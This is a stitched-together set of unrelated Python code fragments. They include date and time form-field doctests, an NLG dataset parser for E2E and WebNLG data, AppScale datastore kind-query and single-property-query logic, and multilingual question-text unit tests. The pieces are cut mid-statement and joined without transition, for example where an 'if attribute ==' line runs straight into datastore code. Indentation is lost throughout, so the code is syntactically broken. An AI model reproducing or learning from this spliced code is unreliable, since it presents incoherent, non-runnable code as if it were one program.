>>> f = DateField(required=False)
>>> f.clean(None)
>>> repr(f.clean(None))
'None'
>>> f.clean('')
>>> repr(f.clean(''))
'None'
DateField accepts an optional input_formats parameter:
>>> f = DateField(input_formats=['%Y %m %d'])
>>> f.clean(datetime.date(2006, 10, 25))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.date(2006, 10, 25)
>>> f.clean('2006 10 25')
datetime.date(2006, 10, 25)
The input_formats parameter overrides all default input formats,
so the default formats won't work unless you specify them:
>>> f.clean('2006-10-25')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('10/25/2006')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('10/25/06')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
# TimeField ###################################################################
>>> import datetime
>>> f = TimeField()
>>> f.clean(datetime.time(14, 25))
datetime.time(14, 25)
>>> f.clean(datetime.time(14, 25, 59))
datetime.time(14, 25, 59)
>>> f.clean('14:25')
datetime.time(14, 25)
>>> f.clean('14:25:59')
datetime.time(14, 25, 59)
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
>>> f.clean('1:24 p.m.')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
# <NAME>, 2017:
from structuredPredictionNLG.Action import Action
from structuredPredictionNLG.MeaningRepresentation import MeaningRepresentation
from structuredPredictionNLG.DatasetInstance import DatasetInstance, cleanAndGetAttr, lexicalize_word_sequence
from structuredPredictionNLG.FullDelexicalizator import full_delexicalize_E2E
from structuredPredictionNLG.SimpleContentPredictor import SimpleContentPredictor
from collections import Counter
import os.path
import re
import Levenshtein
import _pickle as pickle
import json
import xml.etree.ElementTree as ET
import string
from dateutil import parser as dateparser
from nltk.util import ngrams
'''
This is a general specification of a DatasetParser.
A descendant of this class will need to be created for every specific dataset
(to deal with dataset-specific formats)
'''
class DatasetParser:
def __init__(self, trainingFile, developmentFile, testingFile, dataset, opt, light=False):
# self.base_dir = '../'
self.base_dir = ''
self.dataset = dataset
self.dataset_name = opt.name
self.trainingInstances = {}
self.developmentInstances = {}
self.testingInstances = {}
self.trainingInstances = False
self.developmentInstances = False
self.testingInstances = False
self.train_src_to_di = {}
self.dev_src_to_di = {}
self.test_src_to_di = {}
self.available_values = set()
self.available_subjects = set()
self.availableContentActions = {}
self.availableWordActions = {}
self.availableWordCounts = {}
self.trim = opt.trim
self.ngram_lists_per_word_sequence = {}
self.ngram_lists_per_relexed_word_sequence = {}
self.total_relexed_ngram_lists = set()
self.check_cache_path()
if (opt.reset or not self.loadTrainingLists(opt.trim, opt.full_delex, opt.infer_MRs, light)) and trainingFile:
self.predicates = []
self.attributes = {}
self.valueAlignments = {}
self.vocabulary = set()
self.maxWordSequenceLength = 0
self.trainingInstances = self.createLists(self.base_dir + trainingFile, forTrain=True, full_delex=opt.full_delex, infer_MRs=opt.infer_MRs)
# Post-processing of training data begins
for predicate in self.trainingInstances:
for di in self.trainingInstances[predicate]:
for attr in di.input.attributeValues:
self.available_values.add(di.input.attributeValues[attr])
if di.input.attributeSubjects:
for attr in di.input.attributeSubjects:
self.available_subjects.add(di.input.attributeSubjects[attr])
# Create the evaluation refs for train data
for predicate in self.trainingInstances:
for di in self.trainingInstances[predicate]:
refs = set()
refs.add(di.directReference)
refSeqs = [[o.label.lower() for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
refActionSeqs = [[o for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
for di2 in self.trainingInstances[predicate]:
if di != di2 and di2.input.getAbstractMR() == di.input.getAbstractMR():
refs.add(" ".join(lexicalize_word_sequence(di2.directReferenceSequence, di.input.delexicalizationMap, complex_relex=True)).strip())
if di2.directReferenceSequence not in refSeqs:
refSeqs.append(list(o.label.lower() for o in di2.directReferenceSequence if o.label != Action.TOKEN_SHIFT))
refActionSeqs.append(list([o for o in di2.directReferenceSequence if o.label != Action.TOKEN_SHIFT]))
di.output.evaluationReferences = refs
di.output.evaluationReferenceSequences = refSeqs
di.output.evaluationReferenceActionSequences = refActionSeqs
di.output.calcEvaluationReferenceAttrValueSequences()
for refSeq in refSeqs:
refSeqTxt = ' '.join(refSeq)
if refSeqTxt not in self.ngram_lists_per_word_sequence:
self.ngram_lists_per_word_sequence[refSeqTxt] = self.get_ngram_list(refSeq)
self.initializeActionSpace()
if opt.trim:
self.trimTrainingSpace()
# Initializing the action space again after trimming results in fewer actions
self.initializeActionSpace()
self.vocabulary_per_attr = {}
for predicate in self.attributes:
self.vocabulary_per_attr[predicate] = {}
for attr in self.attributes[predicate]:
self.vocabulary_per_attr[predicate][attr] = set()
for predicate in self.trainingInstances:
for di in self.trainingInstances[predicate]:
for a in di.directReferenceSequence:
if a.label != Action.TOKEN_SHIFT:
attr = cleanAndGetAttr(a.attribute)
self.vocabulary_per_attr[di.input.predicate][attr].add(a.label)
for predicate in self.trainingInstances:
if predicate not in self.train_src_to_di:
self.train_src_to_di[predicate] = {}
for di in self.trainingInstances[predicate]:
di.input.nn_src = " ".join(["{} {}".format(attr, di.input.attributeValues[attr]) if attr in di.input.attributeValues else "{}@none@ {}_value@none@".format(attr, attr) for attr in [i for i in di.directAttrSequence if i != Action.TOKEN_SHIFT]])
self.train_src_to_di[predicate][di.input.nn_src] = di
for ref in di.output.evaluationReferences:
refSeq = ref.split(" ")
if ref not in self.ngram_lists_per_relexed_word_sequence:
self.ngram_lists_per_relexed_word_sequence[ref] = self.get_ngram_list(refSeq)
self.writeTrainingLists(opt.trim, opt.full_delex, opt.infer_MRs)
else:
self.initializeActionSpace()
if not light:
self.most_common_words = set()
for predicate in self.trainingInstances:
for word, count in self.availableWordCounts[predicate].most_common():
inAll = True
for attr in self.attributes[predicate]:
if word not in self.availableWordActions[predicate][attr]:
inAll = False
break
if inAll:
self.most_common_words.add(word)
if len(self.most_common_words) > 30:
break
# Silly way of filtering at least one occurrence
#total_relexed_ngram_lists_tmp = set()
for predicate in self.trainingInstances:
for di in self.trainingInstances[predicate]:
for ref in di.output.evaluationReferences:
refSeq = ref.split(" ")
for n_gram in self.get_ngram_list(refSeq, min=3):
#if n_gram in total_relexed_ngram_lists_tmp:
self.total_relexed_ngram_lists.add(n_gram)
#else:
# total_relexed_ngram_lists_tmp.add(n_gram)
scp = False
if (opt.reset or not self.loadDevelopmentLists(opt.full_delex, light)) and developmentFile:
devs = self.createLists(self.base_dir + developmentFile, full_delex=opt.full_delex)
# Create the evaluation refs for development data, as described in https://github.com/tuetschek/e2e-metrics/tree/master/example-inputs
self.developmentInstances = {}
for predicate in devs:
self.developmentInstances[predicate] = []
for di in devs[predicate]:
di.init_alt_outputs()
refs = set()
refs.add(di.directReference)
refSeqs = [[o.label.lower() for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
refActionSeqs = [[o for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
for di2 in devs[predicate]:
if di != di2 and di2.input.getAbstractMR() == di.input.getAbstractMR():
refs.add(" ".join(lexicalize_word_sequence(di2.directReferenceSequence, di.input.delexicalizationMap, complex_relex=True)).strip())
if di2.directReferenceSequence not in refSeqs:
refSeqs.append(list(o.label.lower() for o in di2.directReferenceSequence if o.label != Action.TOKEN_SHIFT))
refActionSeqs.append(list([o for o in di2.directReferenceSequence if o.label != Action.TOKEN_SHIFT]))
di.output.evaluationReferences = set(refs)
di.output.evaluationReferenceSequences = refSeqs[:]
di.output.evaluationReferenceActionSequences = refActionSeqs[:]
di.output.calcEvaluationReferenceAttrValueSequences()
self.developmentInstances[predicate].append(di)
scp = SimpleContentPredictor(self.dataset, self.attributes, self.trainingInstances)
for predicate in self.developmentInstances:
if predicate not in self.dev_src_to_di:
self.dev_src_to_di[predicate] = {}
for di in self.developmentInstances[predicate]:
content_sequence = [cleanAndGetAttr(a.attribute) for a in
scp.rollContentSequence_withLearnedPolicy(di) if
cleanAndGetAttr(a.attribute) != Action.TOKEN_SHIFT]
di.input.nn_src = " ".join(["{} {}".format(attr, di.input.attributeValues[
attr]) if attr in di.input.attributeValues else "{}@none@ {}_value@none@".format(attr,
attr) for
attr in content_sequence])
self.dev_src_to_di[predicate][di.input.nn_src] = di
self.writeDevelopmentLists(opt.full_delex)
for predicate in self.developmentInstances:
for di in self.developmentInstances[predicate]:
for ref in di.output.evaluationReferences:
refSeq = ref.split(" ")
if ref not in self.ngram_lists_per_relexed_word_sequence:
self.ngram_lists_per_relexed_word_sequence[ref] = self.get_ngram_list(refSeq)
for predicate in self.developmentInstances:
for di in self.developmentInstances[predicate]:
for attr in di.input.attributeValues:
self.available_values.add(di.input.attributeValues[attr])
if di.input.attributeSubjects:
for attr in di.input.attributeSubjects:
self.available_subjects.add(di.input.attributeSubjects[attr])
self.writeTrainingLists(opt.trim, opt.full_delex, opt.infer_MRs)
if (opt.reset or not self.loadTestingLists(opt.full_delex, light)) and testingFile:
tests = self.createLists(self.base_dir + testingFile, full_delex=opt.full_delex)
self.testingInstances = {}
for predicate in tests:
self.testingInstances[predicate] = []
for di in tests[predicate]:
di.init_alt_outputs()
refs = set()
refs.add(di.directReference)
refSeqs = [
[o.label.lower() for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
refActionSeqs = [[o for o in di.directReferenceSequence if o.label != Action.TOKEN_SHIFT]]
for di2 in tests[predicate]:
if di != di2 and di2.input.MRstr == di.input.MRstr:
refs.add(di2.directReference)
if di2.directReferenceSequence not in refSeqs:
refSeqs.append(list(o.label.lower() for o in di2.directReferenceSequence if
o.label != Action.TOKEN_SHIFT))
refActionSeqs.append(
list([o for o in di2.directReferenceSequence if o.label != Action.TOKEN_SHIFT]))
di.output.evaluationReferences = set(refs)
di.output.evaluationReferenceSequences = refSeqs[:]
di.output.evaluationReferenceActionSequences = refActionSeqs[:]
di.output.calcEvaluationReferenceAttrValueSequences()
self.testingInstances[predicate].append(di)
if not scp:
scp = SimpleContentPredictor(self.dataset, self.attributes, self.trainingInstances)
for predicate in self.testingInstances:
if predicate not in self.test_src_to_di:
self.test_src_to_di[predicate] = {}
for di in self.testingInstances[predicate]:
content_sequence = [cleanAndGetAttr(a.attribute) for a in
scp.rollContentSequence_withLearnedPolicy(di) if
cleanAndGetAttr(a.attribute) != Action.TOKEN_SHIFT]
di.input.nn_src = " ".join(["{} {}".format(attr, di.input.attributeValues[
attr]) if attr in di.input.attributeValues else "{}@none@ {}_value@none@".format(attr,
attr)
for
attr in content_sequence])
self.test_src_to_di[predicate][di.input.nn_src] = di
self.writeTestingLists(opt.full_delex)
if not light:
self.write_onmt_data(opt)
def get_ngram_list(self, word_sequence, min=1):
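# Descriptive note (added): returns a flat list of padded 4-, 3- and 2-grams
# plus the unigrams of word_sequence, keeping only the orders >= `min`
# (e.g. min=3 keeps just the 4-grams and 3-grams).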
ngram_list = []
seq = word_sequence[:]
if min <= 4:
ngram_list.extend(ngrams(seq, 4, pad_left=True, pad_right=True))
if min <= 3:
ngram_list.extend(ngrams(seq, 3, pad_left=True, pad_right=True))
if min <= 2:
ngram_list.extend(ngrams(seq, 2, pad_left=True, pad_right=True))
if min <= 1:
ngram_list.extend(seq)
return ngram_list
def createLists(self, dataFile, forTrain=False, full_delex=False, infer_MRs=False):
if self.dataset.lower() == 'e2e':
return self.createLists_E2E(dataFile, forTrain, full_delex, infer_MRs)
elif self.dataset.lower() == 'webnlg':
return self.createLists_webnlg(dataFile, forTrain)
elif self.dataset.lower() == 'sfhotel':
return self.createLists_SFX(dataFile, forTrain)
def createLists_E2E(self, dataFile, forTrain=False, full_delex=False, infer_MRs=False):
print("Create lists from ", dataFile, "...")
singlePredicate = 'inform'
instances = dict()
instances[singlePredicate] = []
dataPart = []
# We read the data from the data files.
with open(dataFile, encoding="utf8") as f:
lines = f.readlines()
for s in lines:
s = str(s)
if s.startswith("\""):
dataPart.append(s)
# This dataset has no predicates, so we assume a default predicate
self.predicates.append(singlePredicate)
num = 0
err = 0
# Each line corresponds to a MR
for line in dataPart:
#if num == 0:
# num += 1
# continue
num += 1
if "\"," in line:
MRPart = line.split("\",")[0].strip()
refPart = line.split("\",")[1].lower().strip()
else:
MRPart = line.strip()
refPart = ""
if refPart.startswith("\"") and refPart.endswith("\""):
refPart = refPart[1:-1]
if MRPart.startswith("\""):
MRPart = MRPart[1:]
if refPart.startswith("\""):
refPart = refPart[1:]
if refPart.endswith("\""):
refPart = refPart[:-1]
refPart = re.sub("([.,?:;!'-])", " \g<1> ", refPart)
refPart = refPart.replace("\\?", " \\? ").replace("\\.", " \\.").replace(",", " , ").replace(" ", " ").strip()
refPart = " ".join(refPart.split())
MRAttrValues = MRPart.split(",")
if full_delex:
while ' moderately ' in " " + refPart + " ":
refPart = (" " + refPart + " ").replace(" moderately ", " moderate -ly ").strip()
while ' averagely ' in " " + refPart + " ":
refPart = (" " + refPart + " ").replace(" averagely ", " average -ly ").strip()
while ' highly ' in " " + refPart + " ":
refPart = (" " + refPart + " ").replace(" highly ", " high -ly ").strip()
while ' 5the ' in " " + refPart + " ":
refPart = (" " + refPart + " ").replace(" 5the ", " 5 the ").strip()
# Map from original values to delexicalized values
delexicalizedMap = {}
# Map attributes to their values
attributeValues = {}
for attrValue in MRAttrValues:
value = attrValue[attrValue.find("[") + 1:attrValue.find("]")].strip().lower()
attribute = attrValue[0:attrValue.find("[")].strip().lower().replace(" ", "_").lower()
if attribute == 'familyfriendly' and
+ self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + \
str(ancestor_filter) + \
self._TERM_STRING
if '__key__' not in filter_info:
return startrow, endrow, start_inclusive, end_inclusive
for key_filter in filter_info['__key__']:
op = key_filter[0]
__key__ = str(key_filter[1])
if op and op == datastore_pb.Query_Filter.EQUAL:
startrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
endrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
elif op and op == datastore_pb.Query_Filter.GREATER_THAN:
start_inclusive = self._DISABLE_INCLUSIVITY
startrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
elif op and op == datastore_pb.Query_Filter.GREATER_THAN_OR_EQUAL:
startrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
elif op and op == datastore_pb.Query_Filter.LESS_THAN:
endrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
end_inclusive = self._DISABLE_INCLUSIVITY
elif op and op == datastore_pb.Query_Filter.LESS_THAN_OR_EQUAL:
endrow = prefix + self._SEPARATOR + query.kind() + \
dbconstants.KIND_SEPARATOR + __key__
return startrow, endrow, start_inclusive, end_inclusive
def default_namespace(self):
""" Returns the default namespace entry because the groomer does not
generate it for each application.
Returns:
An entity proto of the default metadata.Namespace.
"""
default_namespace = Namespace(id=1)
protobuf = db.model_to_protobuf(default_namespace)
last_path = protobuf.key().path().element_list()[-1]
last_path.set_id(1)
return protobuf.Encode()
@gen.coroutine
def __kind_query(self, query, filter_info, order_info):
""" Performs kind only queries, kind and ancestor, and ancestor queries
https://developers.google.com/appengine/docs/python/datastore/queries.
Args:
query: The query to run.
filter_info: tuple with filter operators and values.
order_info: tuple with property name and the sort order.
Returns:
An ordered list of entities matching the query.
Raises:
AppScaleDBError: An infinite loop is detected when fetching references.
"""
self.logger.debug('Kind Query:\n{}'.format(query))
filter_info = self.remove_exists_filters(filter_info)
# Detect quickly if this is a kind query or not.
for fi in filter_info:
if fi != "__key__":
return
if query.has_ancestor() and len(order_info) > 0:
result = yield self.ordered_ancestor_query(query, filter_info, order_info)
raise gen.Return(result)
if query.has_ancestor() and not query.has_kind():
result = yield self.ancestor_query(query, filter_info, order_info)
raise gen.Return(result)
elif not query.has_kind():
result = yield self.kindless_query(query, filter_info)
raise gen.Return(result)
elif query.kind().startswith("__") and \
query.kind().endswith("__"):
# Use the default namespace for metadata queries.
query.set_name_space("")
startrow, endrow, start_inclusive, end_inclusive = \
self.kind_query_range(query, filter_info, order_info)
if startrow is None or endrow is None:
return
if query.has_compiled_cursor() and query.compiled_cursor().position_size():
cursor = appscale_stub_util.ListCursor(query)
last_result = cursor._GetLastResult()
prefix = self.get_table_prefix(query)
startrow = get_kind_key(prefix, last_result.key().path())
start_inclusive = self._DISABLE_INCLUSIVITY
if query.compiled_cursor().position_list()[0].start_inclusive() == 1:
start_inclusive = self._ENABLE_INCLUSIVITY
limit = self.get_limit(query)
if startrow > endrow:
raise gen.Return([])
# Since the validity of each reference is not checked until after the
# range query has been performed, we may need to fetch additional
# references in order to satisfy the query.
entities = []
current_limit = limit
while True:
references = yield self.datastore_batch.range_query(
dbconstants.APP_KIND_TABLE,
dbconstants.APP_KIND_SCHEMA,
startrow,
endrow,
current_limit,
offset=0,
start_inclusive=start_inclusive,
end_inclusive=end_inclusive
)
new_entities = yield self.__fetch_entities(references)
entities.extend(new_entities)
# If we have enough valid entities to satisfy the query, we're done.
if len(entities) >= limit:
break
# If we received fewer references than we asked for, they are exhausted.
if len(references) < current_limit:
break
# If all of the references that we fetched were valid, we're done.
if len(new_entities) == len(references):
break
invalid_refs = len(references) - len(new_entities)
# Pad the limit to increase the likelihood of fetching all the valid
# references that we need.
current_limit = invalid_refs + dbconstants.MAX_GROUPS_FOR_XG
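# Worked example (added comment): if 3 of the fetched references were invalid,
# the next pass asks for 3 + MAX_GROUPS_FOR_XG references, starting just after
# the last reference already seen (the start key is made exclusive below).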
self.logger.debug('{} references invalid. Fetching {} more references.'
.format(invalid_refs, current_limit))
# Start from the last reference fetched.
last_startrow = startrow
startrow = references[-1].keys()[0]
start_inclusive = self._DISABLE_INCLUSIVITY
if startrow == last_startrow:
raise dbconstants.AppScaleDBError(
'An infinite loop was detected while fetching references.')
if query.kind() == "__namespace__":
entities = [self.default_namespace()] + entities
results = entities[:limit]
# Handle projection queries.
if query.property_name_size() > 0:
results = self.remove_extra_props(query, results)
self.logger.debug('Returning {} entities'.format(len(results)))
raise gen.Return(results)
def remove_exists_filters(self, filter_info):
""" Remove any filters that have EXISTS filters.
Args:
filter_info: dict of property names mapping to tuples of filter
operators and values.
Returns:
A filter info dictionary without any EXIST filters.
"""
filtered = {}
for key in filter_info.keys():
if filter_info[key][0][0] == datastore_pb.Query_Filter.EXISTS:
continue
else:
filtered[key] = filter_info[key]
return filtered
def remove_extra_equality_filters(self, potential_filter_ops):
""" Keep only the first equality filter for a given property.
Args:
potential_filter_ops: A list of tuples in the form (operation, value).
Returns:
A filter_ops list with only one equality filter.
"""
filter_ops = []
saw_equality_filter = False
for operation, value in potential_filter_ops:
if operation == datastore_pb.Query_Filter.EQUAL and saw_equality_filter:
continue
if operation == datastore_pb.Query_Filter.EQUAL:
saw_equality_filter = True
filter_ops.append((operation, value))
return filter_ops
@gen.coroutine
def __single_property_query(self, query, filter_info, order_info):
"""Performs queries satisfiable by the Single_Property tables.
Args:
query: The query to run.
filter_info: tuple with filter operators and values.
order_info: tuple with property name and the sort order.
Returns:
List of entities retrieved from the given query.
"""
self.logger.debug('Single Property Query:\n{}'.format(query))
if query.kind().startswith("__") and \
query.kind().endswith("__"):
# Use the default namespace for metadata queries.
query.set_name_space("")
filter_info = self.remove_exists_filters(filter_info)
ancestor = None
property_names = set(filter_info.keys())
property_names.update(x[0] for x in order_info)
property_names.discard('__key__')
if len(property_names) != 1:
return
property_name = property_names.pop()
potential_filter_ops = filter_info.get(property_name, [])
# We will apply the other equality filters after fetching the entities.
filter_ops = self.remove_extra_equality_filters(potential_filter_ops)
multiple_equality_filters = self.__get_multiple_equality_filters(
query.filter_list())
if len(order_info) > 1 or (order_info and order_info[0][0] == '__key__'):
return
# If there is an ancestor in the query, it can only have a single
# equality filter, otherwise there is no way to build the start
# and end key.
if query.has_ancestor() and len(filter_ops) > 0 and \
filter_ops[0][0] != datastore_pb.Query_Filter.EQUAL:
return
if query.has_ancestor():
ancestor = query.ancestor()
if not query.has_kind():
return
if order_info and order_info[0][0] == property_name:
direction = order_info[0][1]
else:
direction = datastore_pb.Query_Order.ASCENDING
prefix = self.get_table_prefix(query)
limit = self.get_limit(query)
app_id = clean_app_id(query.app())
if query.has_compiled_cursor() and query.compiled_cursor().position_size():
cursor = appscale_stub_util.ListCursor(query)
last_result = cursor._GetLastResult()
startrow = yield self.__get_start_key(
prefix, property_name, direction, last_result, query=query)
else:
startrow = None
end_compiled_cursor = None
if query.has_end_compiled_cursor():
end_compiled_cursor = query.end_compiled_cursor()
# Since the validity of each reference is not checked until after the
# range query has been performed, we may need to fetch additional
# references in order to satisfy the query.
entities = []
current_limit = limit
while True:
references = yield self.__apply_filters(
filter_ops, order_info, property_name, query.kind(), prefix,
current_limit, 0, startrow, ancestor=ancestor, query=query,
end_compiled_cursor=end_compiled_cursor)
potential_entities = yield self.__fetch_entities_dict(references)
# Since the entities may be out of order due to invalid references,
# we construct a new list in order of valid references.
new_entities = []
for reference in references:
if self.__valid_index_entry(reference, potential_entities, direction,
property_name):
entity_key = reference[reference.keys()[0]]['reference']
valid_entity = potential_entities[entity_key]
new_entities.append(valid_entity)
if len(multiple_equality_filters) > 0:
self.logger.debug('Detected multiple equality filters on a repeated '
'property. Removing results that do not match query.')
new_entities = self.__apply_multiple_equality_filters(
new_entities, multiple_equality_filters)
entities.extend(new_entities)
# If we have enough valid entities to satisfy the query, we're done.
if len(entities) >= limit:
break
# If we received fewer references than we asked for, they are exhausted.
if len(references) < current_limit:
break
# If all of the references that we fetched were valid, we're done.
if len(new_entities) == len(references):
break
invalid_refs = len(references) - len(new_entities)
# Pad the limit to increase the likelihood of fetching all the valid
# references that we need.
current_limit = invalid_refs + dbconstants.MAX_GROUPS_FOR_XG
self.logger.debug('{} references invalid. Fetching {} more references.'
.format(invalid_refs, current_limit))
last_startrow = startrow
# Start from the last reference fetched.
startrow = references[-1].keys()[0]
if startrow == last_startrow:
raise dbconstants.AppScaleDBError(
'An infinite loop was detected while fetching references.')
results = entities[:limit]
# Handle projection queries.
# TODO: When the index has been confirmed clean, use those values directly.
if query.property_name_size() > 0:
results = self.remove_extra_props(query, results)
self.logger.debug('Returning {} results'.format(len(results)))
raise gen.Return(results)
@gen.coroutine
def __apply_filters(self,
filter_ops,
order_info,
property_name,
kind,
prefix,
limit,
offset,
startrow,
force_start_key_exclusive=False,
ancestor=None,
query=None,
end_compiled_cursor=None):
""" Applies property filters in the query.
Args:
filter_ops: Tuple with property filter operator and value.
order_info: Tuple with property name and sort order.
kind: Kind of the entity.
prefix: Prefix for the table.
limit: Number of results.
offset: Number of results to skip.
startrow: Start key for the range scan.
force_start_key_exclusive: Do not include the start key.
ancestor: Optional query ancestor.
self._bank.get_item_form_for_create([MULTI_LANGUAGE_OBJECT_RECORD])
form.add_description(self._english())
form.add_description(self._telugu())
item = self._bank.create_item(form)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.description.text,
self._english_text
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.description.text,
self._english_text
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.description.text,
self._telugu_text
)
def test_first_available_description_if_locale_code_and_english_not_available(self):
form = self._bank.get_item_form_for_create([MULTI_LANGUAGE_OBJECT_RECORD])
form.add_description(self._telugu())
item = self._bank.create_item(form)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.description.text,
self._telugu_text
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.description.text,
self._telugu_text
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.description.text,
self._telugu_text
)
class MultiLanguageQuestionTests(MultiLanguageBaseTestCase):
def setUp(self):
super(MultiLanguageQuestionTests, self).setUp()
def tearDown(self):
super(MultiLanguageQuestionTests, self).tearDown()
def test_can_set_multiple_question_texts(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._hindi())
form.add_text(self._telugu())
self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
3
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
self.assertEqual(
item.get_question().get_text().text,
self._english_text
)
def test_can_clear_question_texts(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._hindi())
form.add_text(self._telugu())
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
3
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
self.assertEqual(
item.get_question().get_text().text,
self._english_text
)
form = self._bank.get_question_form_for_update(question.ident)
form.clear_texts()
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
0
)
self.assertEqual(
item.get_question().get_text().text,
''
)
def test_can_remove_a_question_text_by_language(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._hindi())
form.add_text(self._telugu())
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
3
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
form = self._bank.get_question_form_for_update(question.ident)
form.remove_text_language(self._english().language_type)
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
2
)
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
self.assertEqual(
item.get_question().get_text().text,
self._hindi_text
)
def test_can_replace_a_question_text(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._hindi())
form.add_text(self._telugu())
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
3
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
new_english_feedback = DisplayText(display_text_map={
'text': 'foo',
'languageTypeId': '639-2%3AENG%40ISO',
'scriptTypeId': '15924%3ALATN%40ISO',
'formatTypeId': 'TextFormats%3APLAIN%40okapia.net'
})
form = self._bank.get_question_form_for_update(question.ident)
form.edit_text(new_english_feedback)
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['texts']),
3
)
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['texts'])
self.assertIn(self._str_txt(new_english_feedback), item._my_map['question']['texts'])
self.assertEqual(
item.get_question().get_text().text,
'foo'
)
def test_setting_proxy_locale_gets_question_text_in_specified_language(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._hindi())
form.add_text(self._telugu())
self._bank.create_question(form)
item = self._bank.get_item(item.ident)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_text().text,
self._hindi_text
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_text().text,
self._english_text
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_text().text,
self._telugu_text
)
def test_english_default_question_text_if_locale_code_not_available(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_QUESTION_RECORD])
form.add_text(self._english())
form.add_text(self._telugu())
self._bank.create_question(form)
item = self._bank.get_item(item.ident)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_text().text,
self._english_text
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_text().text,
self._english_text
)
